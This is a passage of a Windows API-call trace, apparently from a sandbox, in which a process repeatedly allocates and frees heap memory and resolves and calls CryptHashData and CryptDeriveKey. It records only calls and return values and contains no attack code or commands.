dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a790b0 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a644f8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711c8 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a80 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a649a8 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a98 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69ac0 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711c8 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a20 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711d8 [0085.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a38 [0085.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a790b0 | out: hHeap=0x2af0000) returned 1 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a50 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71328 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64888 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712f8 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69940 [0085.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647c8 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71338 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712f8 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69940 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64888 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64810 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71328 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64870 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a68 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71248 [0085.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712a8 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647c8 [0085.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71328 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71348 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64888 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71328 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711d8 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711d8 | out: hHeap=0x2af0000) returned 1 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71338 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71378 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71398 [0085.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71398 | out: hHeap=0x2af0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71348 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712c8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712c8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71258 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712d8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71258 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712d8 [0085.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0085.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xe) returned 0x2a64828 [0085.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2a64828, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0085.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.639] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71288 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71358 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71248 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711f8 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71358 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71248 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711f8 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647f8 | out: hHeap=0x2af0000) returned 1 [0085.640] CryptHashData (hHash=0x9a3d00, pbData=0x2a712b8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71358 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647f8 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71378 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71378 | out: hHeap=0x2af0000) returned 1 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64828 | out: hHeap=0x2af0000) returned 1 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64828 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71208 [0085.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648a0 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71208 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648a0 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711e8 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648d0 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711e8 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a648b8 | out: hHeap=0x2af0000) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69bb0 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648b8 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71248 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a648d0 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63c40 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63d48 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712d8 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63d48 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712d8 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63d48 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a63c40 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64108 [0085.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a712e8 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64108 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712e8 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a63c40 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71328 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71338 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71348 | out: hHeap=0x2af0000) returned 1 [0085.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712c8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64888 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647c8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a712a8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64738 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64528 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64750 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64960 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a647b0 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a644f8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a649a8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a80 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a08 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711c8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69ac0 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a98 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a38 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a20 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a50 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64870 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64810 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64a68 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71318 | out: hHeap=0x2af0000) returned 1 [0085.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71368 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a711a8 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71398 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71378 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a647b0 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a712e8 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64810 [0085.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.643] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71278 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a08 [0085.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64a98 [0085.643] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0085.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0085.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0085.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2a64510, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0085.645] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3d00, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3b40) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64510 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71288 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64510 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2a64570 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a711a8 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f39c0 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a711a8 | out: hHeap=0x2af0000) returned 1 [0085.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a64570 | out: hHeap=0x2af0000) returned 1 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f39c0 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0085.646] RtlAllocateHeap (HeapHandle=0x2af0000, 